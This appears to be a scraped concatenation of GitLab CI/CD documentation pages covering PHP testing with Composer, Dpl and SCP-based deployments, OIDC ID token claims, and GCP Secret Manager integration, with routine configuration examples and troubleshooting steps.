There is a fork at [`madumlao/phpenv`](https://github.com/madumlao/phpenv) that tries to bring the project back to life. [`CHH/phpenv`](https://github.com/CHH/phpenv) also seems like a good alternative. Picking any of the mentioned tools works with the basic phpenv commands. Guiding you to choose the right phpenv is out of the scope of this tutorial.

### Install custom extensions

Because this is a pretty bare installation of the PHP environment, you may need some extensions that are not currently present on the build machine.

To install additional extensions, execute:

```shell
pecl install <extension>
```

It's not advised to add this to `.gitlab-ci.yml`. You should execute this command once, only to set up the build environment.

## Extend your tests

### Using `atoum`

Instead of PHPUnit, you can use any other tool to run unit tests. For example you can use [`atoum`](https://github.com/atoum/atoum):

```yaml
test:atoum:
  before_script:
    - wget http://downloads.atoum.org/nightly/mageekguy.atoum.phar
  script:
    - php mageekguy.atoum.phar
```

### Using Composer

The majority of PHP projects use Composer for managing their PHP packages. To execute Composer before running your tests, add the following to your `.gitlab-ci.yml`:

```yaml
# Composer stores all downloaded packages in the vendor/ directory.
# Do not use the following if the vendor/ directory is committed to
# your git repository.
default:
  cache:
    paths:
      - vendor/

  before_script:
    # Install composer dependencies
    - wget https://composer.github.io/installer.sig -O - -q | tr -d '\n' > installer.sig
    - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
    - php -r "if (hash_file('SHA384', 'composer-setup.php') === file_get_contents('installer.sig')) { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"
    - php composer-setup.php
    - php -r "unlink('composer-setup.php'); unlink('installer.sig');"
    - php composer.phar install
```

## Access private packages or dependencies

If your test suite needs to access a private repository, you need to configure the [SSH keys](../jobs/ssh_keys.md) to be able to clone it.

## Use databases or other services

Most of the time, you need a running database for your tests to be able to run. If you're using the Docker executor, you can leverage Docker to link to other containers. With GitLab Runner, this can be achieved by defining a `service`. This functionality is covered in [the CI services](../services/_index.md) documentation.

## Example project

We have set up an [Example PHP Project](https://gitlab.com/gitlab-examples/php) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md).

Want to hack on it? Fork it, commit, and push your changes. Within a few moments the changes are picked up by a public runner and the job begins.
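The Composer installer check above hinges on comparing a freshly computed SHA-384 hash against a separately published signature. A minimal local sketch of the same verify-then-run pattern, using `sha384sum` on a throwaway file (all file names here are illustrative, not part of Composer's tooling):

```shell
# Illustrative re-creation of the verification pattern: publish a hash,
# recompute it over the "downloaded" file, and only proceed on a match.
set -e
workdir="$(mktemp -d)"
cd "$workdir"

printf 'echo "hello from installer"\n' > installer.sh       # stand-in for composer-setup.php
sha384sum installer.sh | awk '{print $1}' > installer.sig   # stand-in for the published signature

expected="$(cat installer.sig)"
actual="$(sha384sum installer.sh | awk '{print $1}')"

if [ "$actual" = "$expected" ]; then
  echo "Installer verified"
else
  echo "Installer corrupt"
  rm -f installer.sh
fi
```

In the CI job above, `https://composer.github.io/installer.sig` plays the role of the locally written signature file; the point is that the expected hash arrives over a channel separate from the installer itself.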
https://docs.gitlab.com/ci/examples/deployment
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/examples/_index.md
2025-08-13
doc/ci/examples/deployment
[ "doc", "ci", "examples", "deployment" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using Dpl as a deployment tool
null
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using Dpl as a deployment tool
breadcrumbs:
- doc
- ci
- examples
- deployment
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

[Dpl](https://github.com/travis-ci/dpl) (pronounced like the letters D-P-L) is a deploy tool made for continuous deployment that's developed and used by Travis CI, but can also be used with GitLab CI/CD.

Dpl can be used to deploy to any of the [supported providers](https://github.com/travis-ci/dpl#supported-providers).

## Prerequisite

To use Dpl you need at least Ruby 1.9.3 with the ability to install gems.

## Basic usage

Dpl can be installed on any machine with:

```shell
gem install dpl
```

This allows you to test all commands from your local terminal, rather than having to test it on a CI server.

If you don't have Ruby installed you can do it on Debian-compatible Linux with:

```shell
apt-get update
apt-get install ruby-dev
```

Dpl provides support for a vast number of services, including: Heroku, Cloud Foundry, AWS/S3, and more. To use it, define the provider and any additional parameters required by the provider.

For example, if you want to use it to deploy your application to Heroku, you need to specify `heroku` as the provider, and specify `api_key` and `app`. All possible parameters can be found in the [Heroku API section](https://github.com/travis-ci/dpl#heroku-api).

```yaml
staging:
  stage: deploy
  script:
    - gem install dpl
    - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY
  environment: staging
```

In the previous example we use Dpl to deploy `my-app-staging` to the Heroku server with the API key stored in the `HEROKU_STAGING_API_KEY` secure variable.
To use a different provider, take a look at the long list of [Supported Providers](https://github.com/travis-ci/dpl#supported-providers).

## Using Dpl with Docker

In most cases, you configured [GitLab Runner](https://docs.gitlab.com/runner/) to use your server's shell commands. This means that all commands are run in the context of a local user (for example `gitlab_runner` or `gitlab_ci_multi_runner`). It also means that most probably your Docker container doesn't have the Ruby runtime installed. You must install it:

```yaml
staging:
  stage: deploy
  script:
    - apt-get update -yq
    - apt-get install -y ruby-dev
    - gem install dpl
    - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY
  rules:
    - if: $CI_COMMIT_BRANCH == "main"
  environment: staging
```

The first line, `apt-get update -yq`, updates the list of available packages, while the second, `apt-get install -y ruby-dev`, installs the Ruby runtime on the system. The previous example is valid for all Debian-compatible systems.

## Usage in staging and production

It's pretty common in the development workflow to have staging (development) and production environments.

Let's consider the following example: we would like to deploy the `main` branch to `staging` and all tags to the `production` environment.
The final `.gitlab-ci.yml` for that setup would look like this:

```yaml
staging:
  stage: deploy
  script:
    - gem install dpl
    - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY
  rules:
    - if: $CI_COMMIT_BRANCH == "main"
  environment: staging

production:
  stage: deploy
  script:
    - gem install dpl
    - dpl heroku api --app=my-app-production --api_key=$HEROKU_PRODUCTION_API_KEY
  rules:
    - if: $CI_COMMIT_TAG
  environment: production
```

We created two deploy jobs that are executed on different events:

- `staging`: Executed for all commits pushed to the `main` branch
- `production`: Executed for all pushed tags

We also use two secure variables:

- `HEROKU_STAGING_API_KEY`: Heroku API key used to deploy the staging app
- `HEROKU_PRODUCTION_API_KEY`: Heroku API key used to deploy the production app

## Storing API keys

To store API keys as secure variables:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Variables**.

The variables defined in the project settings are sent along with the build script to the runner. The secure variables are stored out of the repository. Never store secrets in your project's `.gitlab-ci.yml` file. It is also important that the secret's value is hidden in the job log.

You access an added variable by prefixing its name with `$` (on non-Windows runners) or `%` (for Windows Batch runners):

- `$VARIABLE`: Use for non-Windows runners
- `%VARIABLE%`: Use for Windows Batch runners

Read more about [CI/CD variables](../../variables/_index.md).
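The two `rules:` clauses above amount to a simple branch-or-tag dispatch. Purely as an illustration (GitLab evaluates `rules:` itself; `deploy_target` and its arguments are hypothetical stand-ins for `$CI_COMMIT_BRANCH` and `$CI_COMMIT_TAG`), the routing can be sketched as:

```shell
# Sketch of the dispatch encoded by the rules: clauses above.
deploy_target() {
  commit_branch="$1"   # stand-in for $CI_COMMIT_BRANCH
  commit_tag="$2"      # stand-in for $CI_COMMIT_TAG (empty unless a tag was pushed)
  if [ "$commit_branch" = "main" ]; then
    echo "staging"     # matches: if: $CI_COMMIT_BRANCH == "main"
  elif [ -n "$commit_tag" ]; then
    echo "production"  # matches: if: $CI_COMMIT_TAG
  else
    echo "none"        # no rule matches, so no deploy job runs
  fi
}

deploy_target main ""      # → staging
deploy_target "" v1.0.0    # → production
```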
https://docs.gitlab.com/ci/examples/composer-npm-deploy
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/examples/composer-npm-deploy.md
2025-08-13
doc/ci/examples/deployment
[ "doc", "ci", "examples", "deployment" ]
composer-npm-deploy.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Running Composer and npm scripts with deployment via SCP in GitLab CI/CD
null
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Running Composer and npm scripts with deployment via SCP in GitLab CI/CD
breadcrumbs:
- doc
- ci
- examples
- deployment
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This guide covers the building of dependencies of a PHP project while compiling assets via an npm script using [GitLab CI/CD](../../_index.md).

While it is possible to create your own image with custom PHP and Node.js versions, for brevity we use an existing [Docker image](https://hub.docker.com/r/tetraweb/php/) that has both PHP and Node.js installed.

```yaml
image: tetraweb/php
```

The next step is to install the zip/unzip packages and make composer available. We place these in the `before_script` section:

```yaml
before_script:
  - apt-get update
  - apt-get install zip unzip
  - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
  - php composer-setup.php
  - php -r "unlink('composer-setup.php');"
```

This makes sure we have all requirements ready. Next, run `composer install` to fetch all PHP dependencies and `npm install` to load Node.js packages. Then run the `npm` script. We need to append them to the `before_script` section:

```yaml
before_script:
  # ...
  - php composer.phar install
  - npm install
  - npm run deploy
```

In this particular case, the `npm deploy` script is a Gulp script that does the following:

1. Compile CSS & JS
1. Create sprites
1. Copy various assets (images, fonts) around
1. Replace some strings

All these operations put all files into a `build` folder, which is ready to be deployed to a live server.

## How to transfer files to a live server

You have multiple options such as rsync, SCP, or SFTP. For now, use SCP.
To make this work, you must add a GitLab CI/CD Variable (accessible on `gitlab.example/your-project-name/variables`). Name this variable `STAGING_PRIVATE_KEY` and set it to the **private** SSH key of your server.

### Security tip

Create a user that has access **only** to the folder that needs to be updated.

After you create that variable, make sure that key is added to the Docker container on run:

```yaml
before_script:
  # - ....
  - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )'
  - mkdir -p ~/.ssh
  - eval $(ssh-agent -s)
  - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" > ~/.ssh/config'
```

In order, this means that:

1. We check if the `ssh-agent` is available and we install it if it's not.
1. We create the `~/.ssh` folder.
1. We make sure we're running bash.
1. We disable host checking (we don't ask the user to accept when we first connect to a server and, because every job equals a first connect, we need this).

And this is basically all you need in the `before_script` section.

## How to deploy

As we stated previously, we need to deploy the `build` folder from the Docker image to our server. To do so, we create a new job:

```yaml
stage_deploy:
  artifacts:
    paths:
      - build/
  rules:
    - if: $CI_COMMIT_BRANCH == "dev"
  script:
    - ssh-add <(echo "$STAGING_PRIVATE_KEY")
    - ssh -p22 server_user@server_host "mkdir htdocs/wp-content/themes/_tmp"
    - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/_tmp
    - ssh -p22 server_user@server_host "mv htdocs/wp-content/themes/live htdocs/wp-content/themes/_old && mv htdocs/wp-content/themes/_tmp htdocs/wp-content/themes/live"
    - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/_old"
```

Here's the breakdown:

1. `rules:if: $CI_COMMIT_BRANCH == "dev"` means that this build runs only when something is pushed to the `dev` branch. You can remove this block completely and have everything run on every push (but probably this is something you don't want).
1. `ssh-add ...` adds the private key you added on the web UI to the Docker container.
1. We connect via `ssh` and create a new `_tmp` folder.
1. We connect via `scp` and upload the `build` folder (which was generated by an `npm` script) to our previously created `_tmp` folder.
1. We connect again via `ssh` and move the `live` folder to an `_old` folder, then move `_tmp` to `live`.
1. We connect via `ssh` and remove the `_old` folder.

What's the deal with the artifacts? We tell GitLab CI/CD to keep the `build` directory (later on, you can download that as needed).

### Why we do it this way

If you're using this only for a staging server, you could do this in two steps:

```yaml
- ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/live/*"
- scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/live
```

The problem is that there's a small period of time when you don't have the app on your server.

Therefore, for a production environment we use additional steps to ensure that at any given time, a functional app is in place.

## Where to go next

Because this was a WordPress project, it includes real code snippets. Some further ideas you can pursue:

- Having a slightly different script for the default branch allows you to deploy to a production server from that branch and to a stage server from any other branches.
- Instead of pushing it live, you can push it to the WordPress official repository.
- You could generate i18n text domains on the fly.
---

Our final `.gitlab-ci.yml` looks like this:

```yaml
stage_deploy:
  image: tetraweb/php
  artifacts:
    paths:
      - build/
  rules:
    - if: $CI_COMMIT_BRANCH == "dev"
  before_script:
    - apt-get update
    - apt-get install zip unzip
    - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
    - php composer-setup.php
    - php -r "unlink('composer-setup.php');"
    - php composer.phar install
    - npm install
    - npm run deploy
    - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )'
    - mkdir -p ~/.ssh
    - eval $(ssh-agent -s)
    - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" > ~/.ssh/config'
  script:
    - ssh-add <(echo "$STAGING_PRIVATE_KEY")
    - ssh -p22 server_user@server_host "mkdir htdocs/wp-content/themes/_tmp"
    - scp -P22 -r build/* server_user@server_host:htdocs/wp-content/themes/_tmp
    - ssh -p22 server_user@server_host "mv htdocs/wp-content/themes/live htdocs/wp-content/themes/_old && mv htdocs/wp-content/themes/_tmp htdocs/wp-content/themes/live"
    - ssh -p22 server_user@server_host "rm -rf htdocs/wp-content/themes/_old"
```
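The swap performed over SSH in the `script:` section (rotate `live` to `_old`, promote `_tmp`, delete `_old`) can be rehearsed locally. A sketch under a throwaway directory (the paths are illustrative):

```shell
# Rehearse the _tmp -> live -> _old rotation from the deploy job locally.
set -e
root="$(mktemp -d)/themes"
mkdir -p "$root/live" "$root/_tmp"
echo "old build" > "$root/live/index.txt"
echo "new build" > "$root/_tmp/index.txt"   # what scp just uploaded

mv "$root/live" "$root/_old"                # step 1: park the current release
mv "$root/_tmp" "$root/live"                # step 2: promote the new build
rm -rf "$root/_old"                         # step 3: clean up

cat "$root/live/index.txt"                  # → new build
```

Because the window between the two `mv` calls is tiny (two renames on the same filesystem), visitors almost never see a missing `live` folder — which is exactly the concern raised in "Why we do it this way".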
---
title: OpenID Connect (OIDC) Authentication Using ID Tokens
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
url: https://docs.gitlab.com/ci/id_token_authentication
source: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/id_token_authentication.md
date extracted: 2025-08-13
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/356986) in GitLab 15.7.

{{< /history >}}

You can authenticate with third-party services using GitLab CI/CD's [ID tokens](../yaml/_index.md#id_tokens).

## ID Tokens

[ID tokens](../yaml/_index.md#id_tokens) are JSON Web Tokens (JWTs) that can be added to a GitLab CI/CD job. They can be used for OIDC authentication with third-party services, and are used by the [`secrets`](../yaml/_index.md#secrets) keyword to authenticate with HashiCorp Vault.

ID tokens are configured in the `.gitlab-ci.yml` file. For example:

```yaml
job_with_id_tokens:
  id_tokens:
    FIRST_ID_TOKEN:
      aud: https://first.service.com
    SECOND_ID_TOKEN:
      aud: https://second.service.com
  script:
    - first-service-authentication-script.sh $FIRST_ID_TOKEN
    - second-service-authentication-script.sh $SECOND_ID_TOKEN
```

In this example, the two tokens have different `aud` claims. Third-party services can be configured to reject tokens that do not have an `aud` claim matching their bound audience. Use this functionality to reduce the number of services with which a token can authenticate. This reduces the severity of having a token compromised.

### Token payload

The following standard claims are included in each ID token:

| Field | Description |
|--------------------------------------------------------------------|-------------|
| [`iss`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.1) | Issuer of the token, which is the domain of the GitLab instance ("issuer" claim). |
| [`sub`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.2) | Subject of the token ("subject" claim). Defaults to `project_path:{group}/{project}:ref_type:{type}:ref:{branch_name}`. Can be configured for the project with the [projects API](../../api/projects.md#edit-a-project). |
| [`aud`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.3) | Intended audience for the token ("audience" claim). Specified in the [ID tokens](../yaml/_index.md#id_tokens) configuration. The domain of the GitLab instance by default. |
| [`exp`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.4) | The expiration time ("expiration time" claim). |
| [`nbf`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.5) | The time after which the token becomes valid ("not before" claim). |
| [`iat`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.6) | The time the JWT was issued ("issued at" claim). |
| [`jti`](https://www.rfc-editor.org/rfc/rfc7519.html#section-4.1.7) | Unique identifier for the token ("JWT ID" claim). |

The token also includes custom claims provided by GitLab:

| Field | When | Description |
|-------------------------|--------------------------------------------|-------------|
| `namespace_id` | Always | Use this to scope to group or user level namespace by ID. |
| `namespace_path` | Always | Use this to scope to group or user level namespace by path. |
| `project_id` | Always | Use this to scope to project by ID. |
| `project_path` | Always | Use this to scope to project by path. |
| `user_id` | Always | ID of the user executing the job. |
| `user_login` | Always | Username of the user executing the job. |
| `user_email` | Always | Email of the user executing the job. |
| `user_access_level` | Always | Access level of the user executing the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/432052) in GitLab 16.9. |
| `user_identities` | User Preference setting | List of the user's external identities ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387537) in GitLab 16.0). |
| `pipeline_id` | Always | ID of the pipeline. |
| `pipeline_source` | Always | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables). |
| `job_id` | Always | ID of the job. |
| `ref` | Always | Git ref for the job. |
| `ref_type` | Always | Git ref type, either `branch` or `tag`. |
| `ref_path` | Always | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. |
| `ref_protected` | Always | `true` if the Git ref is protected, `false` otherwise. |
| `groups_direct` | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11 and put behind the `ci_jwt_groups_direct` [feature flag](../../administration/feature_flags/_index.md) in GitLab 17.3.) |
| `environment` | Job specifies an environment | Environment this job deploys to. |
| `environment_protected` | Job specifies an environment | `true` if deployed environment is protected, `false` otherwise. |
| `deployment_tier` | Job specifies an environment | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of the environment the job specifies. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2. |
| `environment_action` | Job specifies an environment | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) |
| `runner_id` | Always | ID of the runner executing the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. |
| `runner_environment` | Always | The type of runner used by the job. Can be either `gitlab-hosted` or `self-hosted`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. |
| `sha` | Always | The commit SHA for the job. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.0. |
| `ci_config_ref_uri` | Always | The ref path to the top-level pipeline definition, for example, `gitlab.example.com/my-group/my-project//.gitlab-ci.yml@refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.2. This claim is `null` unless the pipeline definition is located in the same project. |
| `ci_config_sha` | Always | Git commit SHA for the `ci_config_ref_uri`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/404722) in GitLab 16.2. This claim is `null` unless the pipeline definition is located in the same project. |
| `project_visibility` | Always | The [visibility](../../user/public_access.md) of the project where the pipeline is running. Can be `internal`, `private`, or `public`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/418810) in GitLab 16.3. |

An example token payload:

```json
{
  "namespace_id": "72",
  "namespace_path": "my-group",
  "project_id": "20",
  "project_path": "my-group/my-project",
  "user_id": "1",
  "user_login": "sample-user",
  "user_email": "sample-user@example.com",
  "user_identities": [
    {"provider": "github", "extern_uid": "2435223452345"},
    {"provider": "bitbucket", "extern_uid": "john.smith"}
  ],
  "pipeline_id": "574",
  "pipeline_source": "push",
  "job_id": "302",
  "ref": "feature-branch-1",
  "ref_type": "branch",
  "ref_path": "refs/heads/feature-branch-1",
  "ref_protected": "false",
  "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"],
  "environment": "test-environment2",
  "environment_protected": "false",
  "deployment_tier": "testing",
  "environment_action": "start",
  "runner_id": 1,
  "runner_environment": "self-hosted",
  "sha": "714a629c0b401fdce83e847fc9589983fc6f46bc",
  "project_visibility": "public",
  "ci_config_ref_uri": "gitlab.example.com/my-group/my-project//.gitlab-ci.yml@refs/heads/main",
  "ci_config_sha": "714a629c0b401fdce83e847fc9589983fc6f46bc",
  "jti": "235b3a54-b797-45c7-ae9a-f72d7bc6ef5b",
  "iss": "https://gitlab.example.com",
  "iat": 1681395193,
  "nbf": 1681395188,
  "exp": 1681398793,
  "sub": "project_path:my-group/my-project:ref_type:branch:ref:feature-branch-1",
  "aud": "https://vault.example.com"
}
```

The ID token is encoded by using RS256 and signed with a dedicated private key. The expiry time for the token is set to the job's timeout, if specified, or 5 minutes if no timeout is specified.

## ID Token authentication with third party services

You can use ID tokens for OIDC authentication with a third party service. For example:

- [HashiCorp Vault](hashicorp_vault.md)
- [Google Cloud Secret Manager](gcp_secret_manager.md#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets)
- [Azure Key Vault](azure_key_vault.md#use-azure-key-vault-secrets-in-a-cicd-job)

## Troubleshooting

### `400: missing token` status code

This error indicates that one or more basic components necessary for ID tokens are either missing or not configured as expected.

To find the problem, an administrator can look for more details in the instance's `exceptions_json.log` for the specific method that failed.

### `GitLab::Ci::Jwt::NoSigningKeyError`

This error in the `exceptions_json.log` file is likely because the signing key is missing from the database and the token could not be generated. To verify this is the issue, run the following query on the instance's PostgreSQL terminal:

```sql
SELECT encrypted_ci_jwt_signing_key FROM application_settings;
```

If the returned value is empty, use the following Rails snippet to generate a new key and replace it internally:

```ruby
key = OpenSSL::PKey::RSA.new(2048).to_pem

ApplicationSetting.find_each do |application_setting|
  application_setting.update(ci_jwt_signing_key: key)
end
```

### `401: unauthorized` status code

This error indicates that the authentication request failed.

When using OpenID Connect (OIDC) authentication from GitLab pipelines to external services, `401 Unauthorized` errors can occur due to several common reasons:

- You used a deprecated token, such as `$CI_JOB_JWT_V2`, instead of [declaring an ID token](../yaml/_index.md#id_tokens). For more information, see [old versions of JSON Web Tokens are deprecated](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated).
- You mismatched `provider_name` values between your `.gitlab-ci.yml` file and the OIDC Identity Provider configuration on the external service.
- You missed or mismatched the `aud` (audience) claim between the ID token issued by GitLab and what the external service expects.
- You did not enable or configure the `id_tokens:` block in the GitLab CI/CD job.

To resolve the error, decode the token inside your job:

```shell
echo $OIDC_TOKEN | cut -d '.' -f2 | base64 -d | jq .
```

Make sure that:

- `aud` (audience) matches the expected audience (for example, the external service's URL).
- `sub` (subject) is mapped in the service's Identity Provider settings.
- `preferred_username` is not present by default in GitLab ID tokens.
---
title: Use GCP Secret Manager secrets in GitLab CI/CD
stage: Software Supply Chain Security
group: Pipeline Security
url: https://docs.gitlab.com/ci/gcp_secret_manager
source: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/gcp_secret_manager.md
date extracted: 2025-08-13
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/11739) in GitLab and GitLab Runner 16.8.

{{< /history >}}

You can use secrets stored in the [Google Cloud (GCP) Secret Manager](https://cloud.google.com/security/products/secret-manager) in your GitLab CI/CD pipelines.

The flow for using GitLab with GCP Secret Manager is:

1. GitLab issues an ID token to the CI/CD job.
1. The runner authenticates to GCP using the ID token.
1. GCP verifies the ID token with GitLab.
1. GCP issues a short-lived access token.
1. The runner accesses the secret data using the access token.
1. GCP checks IAM secret permission on the access token's principal.
1. GCP returns the secret data to the runner.

To use GitLab with GCP Secret Manager, you must:

- Have secrets stored in [GCP Secret Manager](https://cloud.google.com/security/products/secret-manager).
- Configure [GCP Workload Identity Federation](#configure-gcp-iam-workload-identity-federation-wif) to include GitLab as an identity provider.
- Configure [GCP IAM](#grant-access-to-gcp-iam-principal) permissions to grant access to GCP Secret Manager.
- Configure [GitLab CI/CD with GCP Secret Manager](#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets).

## Configure GCP IAM Workload Identity Federation (WIF)

GCP IAM WIF must be configured to recognize ID tokens issued by GitLab and assign an appropriate principal to them. The principal is used to authorize access to the Secret Manager resources:

1. In GCP Console, go to **IAM & Admin > Workload Identity Federation**.
1. Select **CREATE POOL** and create a new identity pool with a unique name, for example `gitlab-pool`.
1. Select **ADD PROVIDER** to add a new OIDC Provider to the Identity Pool with a unique name, for example `gitlab-provider`.
1. Set **Issuer (URL)** to the GitLab URL, for example `https://gitlab.com`.
1. Select **Default audience**, or select **Allowed audiences** for a custom audience, which is used in the `aud` for the GitLab CI/CD ID token.
1. Under **Attribute Mapping**, create the following mappings, where:

   - `attribute.X` is the name of the attribute to include as a claim in the Google token.
   - `assertion.X` is the value to extract from the [GitLab claim](../cloud_services/_index.md#id-token-authentication-for-cloud-services).

   | Attribute (on Google)         | Assertion (from GitLab) |
   |-------------------------------|-------------------------|
   | `google.subject`              | `assertion.sub`         |
   | `attribute.gitlab_project_id` | `assertion.project_id`  |

## Grant access to GCP IAM principal

After setting up WIF, you must grant the WIF principal access to the secrets in Secret Manager.

1. In GCP Console, go to **Security > Secret Manager**.
1. Select the name of the secret you wish to grant access to, to view the secret's details.
1. From the **PERMISSIONS** tab, select **GRANT ACCESS** to grant access to the principal set created through the WIF provider. The external identity format is:

   ```plaintext
   principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.gitlab_project_id/GITLAB_PROJECT_ID
   ```

   In this example:

   - `PROJECT_NUMBER`: Your Google Cloud project number (not ID) which can be found in the [Project's dashboard](https://console.cloud.google.com/home/dashboard).
   - `POOL_ID`: The ID (not name) of the workload identity pool created in the first section, for example `gitlab-pool`.
   - `GITLAB_PROJECT_ID`: The GitLab project ID found on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id).

1. Assign the role **Secret Manager Secret Accessor**.

## Configure GitLab CI/CD to use GCP Secret Manager secrets

You must [add these CI/CD variables](../variables/_index.md#for-a-project) to provide details about your GCP Secret Manager:

- `GCP_PROJECT_NUMBER`: The GCP [Project Number](https://cloud.google.com/resource-manager/docs/creating-managing-projects).
- `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID`: The WIF Pool ID, for example `gitlab-pool`.
- `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID`: The WIF Provider ID, for example `gitlab-provider`.

Then you can use secrets stored in GCP Secret Manager in CI/CD jobs by defining them with the `gcp_secret_manager` keyword:

```yaml
job_using_gcp_sm:
  id_tokens:
    GCP_ID_TOKEN:
      # `aud` must match the audience defined in the WIF Identity Pool.
      aud: https://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID}/providers/${GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID}
  secrets:
    DATABASE_PASSWORD:
      gcp_secret_manager:
        name: my-project-secret  # This is the name of the secret defined in GCP Secret Manager
        version: 1               # optional: defaults to `latest`.
      token: $GCP_ID_TOKEN
```

### Use secrets from a different GCP project

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/37487) in GitLab 17.0.

{{< /history >}}

Secret names in GCP are per-project. By default the secret named in `gcp_secret_manager:name` is read from the project specified in `GCP_PROJECT_NUMBER`.

To read a secret from a different project than the project containing the WIF pool, use the fully-qualified secret name formatted as `projects/<project-number>/secrets/<secret-name>`.

For example, if `my-project-secret` is in the GCP project number `123456789`, then you can access the secret with:

```yaml
job_using_gcp_sm:
  # ... as previously configured ...
  secrets:
    DATABASE_PASSWORD:
      gcp_secret_manager:
        name: projects/123456789/secrets/my-project-secret  # fully-qualified name of the secret defined in GCP Secret Manager
        version: 1                                          # optional: defaults to `latest`.
      token: $GCP_ID_TOKEN
```

## Troubleshooting

### Error: The size of mapped attribute `google.subject` exceeds the 127 bytes limit

Long branch paths can cause a job to fail with this error, because the [`assertion.sub` attribute](id_token_authentication.md#token-payload) becomes longer than 127 characters:

```plaintext
ERROR: Job failed (system failure): resolving secrets: failed to exchange sts token: googleapi: got HTTP response code 400 with body: {"error":"invalid_request","error_description":"The size of mapped attribute google.subject exceeds the 127 bytes limit. Either modify your attribute mapping or the incoming assertion to produce a mapped attribute that is less than 127 bytes."}
```

Long branch paths can be caused by:

- Deeply nested subgroups.
- Long group, repository, or branch names.

